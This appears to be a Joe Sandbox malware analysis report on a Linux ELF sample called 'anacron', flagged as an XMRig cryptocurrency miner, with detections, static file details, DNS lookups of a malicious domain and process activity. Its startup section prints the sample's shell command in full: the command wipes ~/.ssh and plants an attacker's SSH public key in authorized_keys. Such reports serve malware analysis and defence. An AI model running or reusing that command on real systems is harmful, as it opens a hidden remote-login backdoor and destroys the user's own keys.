ID: 202040 Sample Name: anacron Cookbook: defaultlinuxfilecookbook.jbs Time: 02:46:46 Date: 20/01/2020 Version: 28.0.0 Lapis Lazuli
Table of Contents
Table of Contents 2
Analysis Report anacron 5
Overview 5
General Information 5
Detection 5
Classification 5
Mitre Att&ck Matrix 6
Signature Overview 7
AV Detection: 7
Bitcoin Miner: 7
Networking: 7
System Summary: 7
Persistence and Installation Behavior: 7
Malware Analysis System Evasion: 7
Malware Configuration 8
Runtime Messages 8
Behavior Graph 8
Yara Overview 8
Initial Sample 8
PCAP (Network Traffic) 9
Dropped Files 9
Sigma Overview 9
Joe Sandbox View / Context 9
IPs 9
Domains 9
ASN 9
JA3 Fingerprints 10
Dropped Files 10
Antivirus, Machine Learning and Genetic Malware Detection 10
Initial Sample 10
Dropped Files 10
Domains 10
URLs 10
Startup 10
Created / dropped Files 11
Domains and IPs 12
Contacted Domains 12
URLs from Memory and Binaries 12
Contacted IPs 12
Public 13
Static File Info 13
General 13
Static ELF Info 13
ELF header 13
Sections 14
Program Segments 14
Dynamic Tags 14
Symbols 15
Network Behavior 15
Network Port Distribution 15
TCP Packets 15
UDP Packets 15
DNS Queries 15
DNS Answers 15
System Behavior 16
Analysis Process: anacron PID: 20758 Parent PID: 20706 16 (General 16; File Activities 16; File Read 16; Directory Enumerated 16)
Analysis Process: anacron PID: 20759 Parent PID: 20758 16 (General 16)
Analysis Process: sh PID: 20759 Parent PID: 20758 16 (General 16; File Activities 17; File Read 17; File Written 17)
Analysis Process: sh PID: 20761 Parent PID: 20759 17 (General 17)
Analysis Process: rm PID: 20761 Parent PID: 20759 17 (General 17; File Activities 17; File Deleted 17; File Read 17)
Analysis Process: sh PID: 20764 Parent PID: 20759 17 (General 17)
Analysis Process: mkdir PID: 20764 Parent PID: 20759 17 (General 18; File Activities 18; File Read 18; Directory Created 18)
Analysis Process: sh PID: 20771 Parent PID: 20759 18 (General 18)
Analysis Process: chmod PID: 20771 Parent PID: 20759 18 (General 18; File Activities 18; File Read 18; Directory Enumerated 18; Permission Modified 18)
Analysis Process: anacron PID: 20780 Parent PID: 20758 18 (General 18; File Activities 18; File Read 19; File Written 19)
Analysis Process: upstart PID: 20811 Parent PID: 20139 19 (General 19)
Analysis Process: sh PID: 20811 Parent PID: 20139 19 (General 19; File Activities 19; File Read 19)
Analysis Process: sh PID: 20812 Parent PID: 20811 19 (General 19)
Analysis Process: date PID: 20812 Parent PID: 20811 19 (General 19; File Activities 19; File Read 20)
Analysis Process: sh PID: 20813 Parent PID: 20811 20 (General 20)
Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811 20 (General 20; File Activities 20; File Read 20; File Written 20; Directory Enumerated 20)
Analysis Process: upstart PID: 20838 Parent PID: 20139 20 (General 20)
Analysis Process: sh PID: 20838 Parent PID: 20139 20 (General 20; File Activities 21; File Read 21)
Analysis Process: sh PID: 20839 Parent PID: 20838 21 (General 21)
Analysis Process: date PID: 20839 Parent PID: 20838 21 (General 21; File Activities 21; File Read 21)
Analysis Process: sh PID: 20855 Parent PID: 20838 21 (General 21)
Analysis Process: apport-gtk PID: 20855 Parent PID: 20838 21 (General 21; File Activities 21; File Read 22; File Written 22; Directory Enumerated 22)
Analysis Process: upstart PID: 20868 Parent PID: 20139 22 (General 22)
Analysis Process: sh PID: 20868 Parent PID: 20139 22 (General 22; File Activities 22; File Read 22)
Analysis Process: sh PID: 20869 Parent PID: 20868 22 (General 22)
Analysis Process: date PID: 20869 Parent PID: 20868 22 (General 22; File Activities 23; File Read 23)
Analysis Process: sh PID: 20870 Parent PID: 20868 23 (General 23)
Analysis Process: apport-gtk PID: 20870 Parent PID: 20868 23 (General 23; File Activities 23; File Read 23; Directory Enumerated 23)
Copyright Joe Security LLC 2020 Page 2 of 23
Analysis Report anacron
Overview
General Information
Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 202040
Start date: 20.01.2020
Start time: 02:46:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 3m 59s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: anacron
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal76.troj.mine.lin@0/4@4/0
Detection
Threat: Xmrig
Strategy | Score | Range | Whitelisted
Threshold | 76 | 0 - 100 | false
Classification
[Classification chart (image): rating scale malicious / suspicious / clean across the categories Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware]
Mitre Att&ck Matrix
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects
Valid Accounts | Command-Line Interface 1 | Hidden Files and Directories 1 | Port Monitors | Hidden Files and Directories 1 | Credential Dumping | Security Software Discovery 1 | Application Deployment Software | Data from Local System | Data Compressed | Standard Non-Application Layer Protocol 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization
Replication Through Removable Media | Scripting 1 | Port Monitors | Accessibility Features | File and Directory Permissions Modification 1 | Network Sniffing | File and Directory Discovery 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization
External Remote Services | Windows Management Instrumentation | Accessibility Features | Path Interception | Scripting 1 | Input Capture | System Information Discovery 3 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Custom Cryptographic Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups
Drive-by Compromise | Scheduled Task | System Firmware | DLL Search Order Hijacking | File Deletion 1 | Credentials in Files | System Network Configuration Discovery | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication | SIM Card Swap |
(The number after a technique name is the count of matched signatures for that technique.)
Signature Overview
• AV Detection
• Bitcoin Miner
• Networking
• System Summary
• Persistence and Installation Behavior
• Malware Analysis System Evasion
AV Detection:
Antivirus detection for sample
Multi AV Scanner detection for submitted file
Bitcoin Miner:
Yara detected Xmrig cryptocurrency miner
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Networking:
Performs DNS lookups
Urls found in memory or binary data
System Summary:
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Classification label
Persistence and Installation Behavior:
Sample reads /proc/mounts (often used for finding a writable filesystem)
Counts the number of processes currently running
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
Reads system information from the proc file system
Sample tries to set the executable flag
Malware Analysis System Evasion:
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Uses the "uname" system call to query kernel version information (possible evasion)
Malware Configuration
No configs have been found
Runtime Messages
Command: /tmp/anacron
Exit Code: 0
Exit Code Info:
Killed: False
Standard Output: [2020-01-20 03:47:29.290] unable to open '/tmp/config.json'.
Standard Error:
Behavior Graph
[Behavior graph (image; legend and interactive controls omitted). Recoverable content: ID: 202040, Sample: anacron, Startdate: 20/01/2020, Architecture: LINUX, Score: 76. Network node: 45.9.148.125 (45164, 80), ASN unknown, debian-package.center, Internet, Netherlands, marked "Is malicious". Signatures attached to the graph: Antivirus detection for sample; Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 2 other signatures; Sample reads /proc/mounts (often used for finding a writable filesystem). Process tree drawn: anacron -> anacron, sh -> rm, mkdir, chmod; upstart -> sh -> date, apport-checkreports; upstart -> sh -> date, apport-gtk (twice).]
Yara Overview
Initial Sample
Source | Rule | Description | Author | Strings
anacron | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Sigma Overview
No Sigma rule has matched
Joe Sandbox View / Context
IPs
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
45.9.148.125 | cron | Get hash | malicious | Browse |
45.9.148.125 | cQLmNrun | Get hash | malicious | Browse |
Domains
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
debian-package.center | cron | Get hash | malicious | Browse | 45.9.148.129
debian-package.center | cron | Get hash | malicious | Browse | 45.9.148.129
ASN
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
unknown | testfile | Get hash | malicious | Browse | 91.189.92.20
unknown | Launcher.apk | Get hash | malicious | Browse | 216.58.201.99
unknown | 5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi%20portafilter%20size | Get hash | malicious | Browse | 185.211.246.22
unknown | 5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi portafilter size | Get hash | malicious | Browse | 185.211.246.22
unknown | Project2.doc | Get hash | malicious | Browse | 51.15.6.128
unknown | https://top4top.io/downloadf-11687unj01-rar.html | Get hash | malicious | Browse | 54.38.152.27
unknown | www.ltyuye.com/wp-admin/rrktd1y-1v-75/ | Get hash | malicious | Browse | 23.235.217.105
unknown | txfc58.com/wordpress/m2utbn-3ft4c-07947/ | Get hash | malicious | Browse | 185.216.113.122
unknown | instructions 01 18 2020.doc | Get hash | malicious | Browse | 23.235.217.105
unknown | instructions 01 18 2020.doc | Get hash | malicious | Browse | 217.160.5.123
unknown | PO987889-JAN-20-20-Order_Quote,pdf.exe | Get hash | malicious | Browse | 172.217.23.193
unknown | koadic_test_online_9997_rundll.vbs | Get hash | malicious | Browse | 79.137.36.9
unknown | www.searchnewtabs.com/download | Get hash | malicious | Browse | 52.206.61.22
unknown | 91.92.66.124/..j/ | Get hash | malicious | Browse | 91.92.66.124
unknown | https://gcc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsway.office.com%2FUN0jHy70XUb7BIXa%3Fref%3DLink&data=02%7C01%7Cjh.jackson%40trade.gov%7Cc3e4a0c456a7407e91f408d79a641704%7Ca1d183f26c7b4d9ab9945f2f31b3f780%7C1%7C1%7C637147626986386689&sdata=AhWGM0VN8KygMfO7X6%2FHVaDVvk7tiKzPkuCoZ%2FooVfs%3D&reserved=0 | Get hash | malicious | Browse | 209.197.3.24
unknown | 95.179.163.186 | Get hash | malicious | Browse | 95.179.163.186
unknown | https://perfecttux.com | Get hash | malicious | Browse | 147.75.84.39
unknown | INVOICE FAF3766_778982019.doc | Get hash | malicious | Browse | 185.216.113.122
unknown | INVOICE FAF3766_778982019.doc | Get hash | malicious | Browse | 217.160.5.123
unknown | FileZilla_3.46.3_win64_sponsored-setup.exe | Get hash | malicious | Browse | 5.62.44.224
JA3 Fingerprints
No context
Dropped Files
No context
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source | Detection | Scanner | Label | Link
anacron | 40% | Virustotal | | Browse
anacron | 100% | Avira | LINUX/BitCoinMiner.hglyx |
Dropped Files
No Antivirus matches
Domains
Source | Detection | Scanner | Label | Link
debian-package.center | 0% | Virustotal | | Browse
URLs
Source | Detection | Scanner | Label | Link
https://xmrig.com/docs/algorithms | 0% | Virustotal | | Browse
https://xmrig.com/docs/algorithms | 0% | Avira URL Cloud | safe |
Startup
system is lnxubuntu1
anacron (PID: 20758, Parent: 20706, MD5: 8d5d71c56b1f807edac5ac734feab41a) Arguments: /tmp/anacron
  anacron New Fork (PID: 20759, Parent: 20758)
  sh (PID: 20759, Parent: 20758, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
    sh New Fork (PID: 20761, Parent: 20759)
    rm (PID: 20761, Parent: 20759, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh
    sh New Fork (PID: 20764, Parent: 20759)
    mkdir (PID: 20764, Parent: 20759, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh
    sh New Fork (PID: 20771, Parent: 20759)
    chmod (PID: 20771, Parent: 20759, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh
  anacron New Fork (PID: 20780, Parent: 20758)
upstart New Fork (PID: 20811, Parent: 20139)
sh (PID: 20811, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
  sh New Fork (PID: 20812, Parent: 20811)
  date (PID: 20812, Parent: 20811, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
  sh New Fork (PID: 20813, Parent: 20811)
  apport-checkreports (PID: 20813, Parent: 20811, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
upstart New Fork (PID: 20838, Parent: 20139)
sh (PID: 20838, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
  sh New Fork (PID: 20839, Parent: 20838)
  date (PID: 20839, Parent: 20838, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
  sh New Fork (PID: 20855, Parent: 20838)
  apport-gtk (PID: 20855, Parent: 20838, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
upstart New Fork (PID: 20868, Parent: 20139)
sh (PID: 20868, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
  sh New Fork (PID: 20869, Parent: 20868)
  date (PID: 20869, Parent: 20868, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
  sh New Fork (PID: 20870, Parent: 20868)
  apport-gtk (PID: 20870, Parent: 20868, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
cleanup
Created / dropped Files
/home/user/.ssh/authorized_keys
Process: /bin/sh
File Type: OpenSSH RSA public key
Size (bytes): 389
Entropy (8bit): 5.91239652812259
Encrypted: false
MD5: A420F7A60A40F3FF3A806A01FEB1DFDA
SHA1: 1AE65132B036DE51BCC62F66B51AE362E11182AF
SHA-256: A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2
SHA-512: 1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF
Malicious: false
Reputation: low
Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr.

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
Process: /tmp/anacron
File Type: ASCII text, with no line terminators
Size (bytes): 6
Entropy (8bit): 1.9182958340544893
Encrypted: false
MD5: 1054DD099E3998ACB4C217F5AE41D8C8
SHA1: 9F649342B81C46321145FB8F13EDD0F61487F1B4
SHA-256: 498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A
SHA-512: 03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7
Malicious: false
Reputation: low
Preview: 128129

/var/crash/_usr_share_apport_apport-checkreports.1000.crash
Process: /usr/share/apport/apport-checkreports
File Type: ASCII text
Size (bytes): 14923
Entropy (8bit): 4.684369237174026
Encrypted: false
MD5: 62591DEB2982540970B8033F260B349B
SHA1: 72631B02B97594A7D1B83641B26C85105E8B62B1
SHA-256: 931DAED4EDA2C49315FF866273E17758D9420E899244DB2A48043DCC5B12340C
SHA-512: 6F9D6266231081B1FB32A845D22B0CC02F1C7E2EB4FA6CAAA7A8F309E44B44C181BE8CD17D0CC2568E3F69CA88D78ECE3E296A830A289058FA53F6DBC3F5CA08
Malicious: false
Reputation: low
Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=

/var/crash/_usr_share_apport_apport-gtk.1000.crash
Process: /usr/share/apport/apport-gtk
File Type: ASCII text
Size (bytes): 47102
Entropy (8bit): 4.494867931830367
Encrypted: false
MD5: 4949187FF25EB31488F0D5DB591FAD08
SHA1: 64D7171189CCE702169C62C441D063C953C86F6A
SHA-256: 8B3DAFECEC14F6BDD7FE2AA80C019F0DB3590D487D8E0FAC63B89E4F09C96032
SHA-512: B29F2FB2E025C128A680A9A68F00D0CDDF3AAA971CD2928705BD876F8AD0194E40CE709B426874D8C4618430C90B46B0F4A1579BC3C090CB236EE272AB0B6794
Malicious: false
Reputation: low
Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01522000-01a45000 rw-p 00000000 00:00 0 [heap]. 7ff67717d000-7ff67727d000 rw-p 00000000 00:00 0 . 7ff67727d000-7ff677294000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7ff677294000-7ff677493000 ---p 00017000 fc:00 2382
Domains and IPs
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
debian-package.center | 45.9.148.117 | true | false | 0%, Virustotal, Browse | unknown
URLs from Memory and Binaries
Contacted IPs
Public
IP | Country | Flag | ASN | ASN Name | Malicious
45.9.148.125 | Netherlands | | 49447 | unknown | true
Static File Info
General
File type: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Entropy (8bit): 6.550050885060555
TrID: ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: anacron
File size: 2902776
MD5: 8d5d71c56b1f807edac5ac734feab41a
SHA1: ca2064303d74f5fec98d717f35cd8ee20e81b722
SHA256: 49da718733de850ddd7e871fee1d2f041508d28b9cfc58a822786151004a9c2c
SHA512: 514337791f6c2b71e9303899a6206f92eb905c780729008f3f754f256811332caa5d608662272a6eb3b1f3cf70d1ec528509bbe3f68c7960fc9df63c463fce3f
SSDEEP: 49152:m7rTifP8qyUnJ1jIYuOwxC7mQ595+T91hGtZ1:Irm38qyUnJ1jgx0B5evhG
File Content Preview: .ELF...... 4...4....G,.....4. ...(...... pu..pu...... }.!.}.!...... ".. ".. "...... +...,...,. .T...... h<,.hL,.hL,...... +...,...,...... P.td0.#.0.#
Static ELF Info
ELF header
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
Machine: Intel 80386
Version Number: 0x1
Type: DYN (Shared object file)
OS/ABI: UNIX - System V
ABI Version: 0
Entry Point Address: 0xbf34
Flags: 0x0
ELF Header Size: 52
Program Header Offset: 52
Program Header Size: 32
Number of Program Headers: 9
Section Header Offset: 2901776
Section Header Size: 40
Number of Section Headers: 25
Header String Table Index: 24
Sections
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
| NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
.gnu.hash | GNU_HASH | 0x154 | 0x154 | 0x18 | 0x4 | 0x2 | A | 2 | 0 | 4
.dynsym | DYNSYM | 0x16c | 0x16c | 0x10 | 0x10 | 0x2 | A | 3 | 1 | 4
.dynstr | STRTAB | 0x17c | 0x17c | 0x1 | 0x0 | 0x2 | A | 0 | 0 | 1
.rel.dyn | REL | 0x180 | 0x180 | 0x73f0 | 0x8 | 0x2 | A | 2 | 0 | 4
.init | PROGBITS | 0x8000 | 0x8000 | 0x11 | 0x0 | 0x6 | AX | 0 | 0 | 1
.plt | PROGBITS | 0x8020 | 0x8020 | 0x80 | 0x4 | 0x6 | AX | 0 | 0 | 16
.text | PROGBITS | 0x80a0 | 0x80a0 | 0x2194d1 | 0x0 | 0x6 | AX | 0 | 0 | 16
.fini | PROGBITS | 0x221571 | 0x221571 | 0xc | 0x0 | 0x6 | AX | 0 | 0 | 1
.rodata | PROGBITS | 0x222000 | 0x222000 | 0x1c230 | 0x0 | 0x2 | A | 0 | 0 | 32
.eh_frame_hdr | PROGBITS | 0x23e230 | 0x23e230 | 0xbf7c | 0x0 | 0x2 | A | 0 | 0 | 4
.eh_frame | PROGBITS | 0x24a1ac | 0x24a1ac | 0x6f068 | 0x0 | 0x2 | A | 0 | 0 | 4
.gcc_except_table | PROGBITS | 0x2b9214 | 0x2b9214 | 0x5ed1 | 0x0 | 0x2 | A | 0 | 0 | 4
.tbss | NOBITS | 0x2c020c | 0x2bf20c | 0x8 | 0x0 | 0x403 | WAT | 0 | 0 | 4
.init_array | INIT_ARRAY | 0x2c020c | 0x2bf20c | 0x78 | 0x4 | 0x3 | WA | 0 | 0 | 4
.fini_array | FINI_ARRAY | 0x2c0284 | 0x2bf284 | 0xc | 0x4 | 0x3 | WA | 0 | 0 | 4
.ctors | PROGBITS | 0x2c0290 | 0x2bf290 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.dtors | PROGBITS | 0x2c0298 | 0x2bf298 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
.data.rel.ro | PROGBITS | 0x2c02a0 | 0x2bf2a0 | 0x49c8 | 0x0 | 0x3 | WA | 0 | 0 | 32
.dynamic | DYNAMIC | 0x2c4c68 | 0x2c3c68 | 0xc8 | 0x8 | 0x3 | WA | 3 | 0 | 4
.got | PROGBITS | 0x2c4d30 | 0x2c3d30 | 0x2c4 | 0x4 | 0x3 | WA | 0 | 0 | 4
.data | PROGBITS | 0x2c5000 | 0x2c4000 | 0x624 | 0x0 | 0x3 | WA | 0 | 0 | 32
.bss | NOBITS | 0x2c5640 | 0x2c4624 | 0x9490 | 0x0 | 0x3 | WA | 0 | 0 | 64
.comment | PROGBITS | 0x0 | 0x2c4624 | 0x1a | 0x1 | 0x30 | MS | 0 | 0 | 1
.shstrtab | STRTAB | 0x0 | 0x2c463e | 0xd2 | 0x0 | 0x0 | | 0 | 0 | 1
Program Segments
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
LOAD | 0x0 | 0x0 | 0x0 | 0x7570 | 0x7570 | 0x4 | R | 0x1000 | | .gnu.hash .dynsym .dynstr .rel.dyn
LOAD | 0x8000 | 0x8000 | 0x8000 | 0x21957d | 0x21957d | 0x5 | R E | 0x1000 | | .init .plt .text .fini
LOAD | 0x222000 | 0x222000 | 0x222000 | 0x9d0e5 | 0x9d0e5 | 0x4 | R | 0x1000 | | .rodata .eh_frame_hdr .eh_frame .gcc_except_table
LOAD | 0x2bf20c | 0x2c020c | 0x2c020c | 0x5418 | 0xe8c4 | 0x6 | RW | 0x1000 | | .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss
DYNAMIC | 0x2c3c68 | 0x2c4c68 | 0x2c4c68 | 0xc8 | 0xc8 | 0x6 | RW | 0x4 | | .dynamic
TLS | 0x2bf20c | 0x2c020c | 0x2c020c | 0x0 | 0x8 | 0x4 | R | 0x4 | |
GNU_EH_FRAME | 0x23e230 | 0x23e230 | 0x23e230 | 0xbf7c | 0xbf7c | 0x4 | R | 0x4 | | .eh_frame_hdr
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0x6 | RW | 0x10 | |
GNU_RELRO | 0x2bf20c | 0x2c020c | 0x2c020c | 0x4df4 | 0x4df4 | 0x4 | R | 0x1 | | .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got
Dynamic Tags
Type | Meta | Value | Tag
DT_SYMBOLIC | value | 0x0 | 0x10
DT_INIT | value | 0x8000 | 0xc
DT_FINI | value | 0x221571 | 0xd
DT_INIT_ARRAY | value | 0x2c020c | 0x19
DT_INIT_ARRAYSZ | bytes | 120 | 0x1b
DT_FINI_ARRAY | value | 0x2c0284 | 0x1a
DT_FINI_ARRAYSZ | bytes | 12 | 0x1c
DT_GNU_HASH | value | 0x154 | 0x6ffffef5
DT_STRTAB | value | 0x17c | 0x5
DT_SYMTAB | value | 0x16c | 0x6
DT_STRSZ | bytes | 1 | 0xa
DT_SYMENT | bytes | 16 | 0xb
DT_DEBUG | value | 0x0 | 0x15
DT_PLTGOT | value | 0x2c4d30 | 0x3
DT_REL | value | 0x180 | 0x11
DT_RELSZ | bytes | 29680 | 0x12
DT_RELENT | bytes | 8 | 0x13
DT_BIND_NOW | value | 0x0 | 0x18
DT_FLAGS_1 | value | 0x8000001 | 0x6ffffffb
DT_RELCOUNT | value | 3710 | 0x6ffffffa
DT_NULL | value | 0x0 | 0x0
Symbols
Symbol Name | Section Name | Value | Size | Symbol Type | Symbol Bind | Visibility | Ndx | Version Info Name | Version Info File Name
(.dynsym, single unnamed entry) | | 0x0 | 0 | NOTYPE | | | | |
Network Behavior
Network Port Distribution
Total Packets: 12 • 53 (DNS) • 80 (HTTP)
TCP Packets
UDP Packets
DNS Queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 20, 2020 02:47:30.142142057 CET | 192.168.2.20 | 8.8.8.8 | 0xc389 | Standard query (0) | debian-package.center | A (IP address) | IN (0x0001)
Jan 20, 2020 02:47:30.142239094 CET | 192.168.2.20 | 8.8.4.4 | 0xc389 | Standard query (0) | debian-package.center | A (IP address) | IN (0x0001)
Jan 20, 2020 02:47:30.142302990 CET | 192.168.2.20 | 8.8.8.8 | 0xd8bc | Standard query (0) | debian-package.center | 28 | IN (0x0001)
Jan 20, 2020 02:47:30.142364979 CET | 192.168.2.20 | 8.8.4.4 | 0xd8bc | Standard query (0) | debian-package.center | 28 | IN (0x0001)
DNS Answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 20, 2020 02:47:30.167655945 CET | 8.8.8.8 | 192.168.2.20 | 0xc389 | No error (0) | debian-package.center | | 45.9.148.117 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:47:30.167655945 CET | 8.8.8.8 | 192.168.2.20 | 0xc389 | No error (0) | debian-package.center | | 45.9.148.129 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:47:30.167655945 CET | 8.8.8.8 | 192.168.2.20 | 0xc389 | No error (0) | debian-package.center | | 45.9.148.125 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:47:30.167726040 CET | 8.8.4.4 | 192.168.2.20 | 0xc389 | No error (0) | debian-package.center | | 45.9.148.125 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:47:30.167726040 CET | 8.8.4.4 | 192.168.2.20 | 0xc389 | No error (0) | debian-package.center | | 45.9.148.117 | A (IP address) | IN (0x0001)
Jan 20, 2020 02:47:30.167726040 CET | 8.8.4.4 | 192.168.2.20 | 0xc389 | No error (0) | debian-package.center | | 45.9.148.129 | A (IP address) | IN (0x0001)
System Behavior
Analysis Process: anacron PID: 20758 Parent PID: 20706
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: /tmp/anacron File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a
File Activities
File Read
Directory Enumerated
Analysis Process: anacron PID: 20759 Parent PID: 20758
General
Start time: 02:47:29 Start date: 20/01/2020 Path: /tmp/anacron Arguments: n/a File size: 2902776 bytes MD5 hash: 8d5d71c56b1f807edac5ac734feab41a
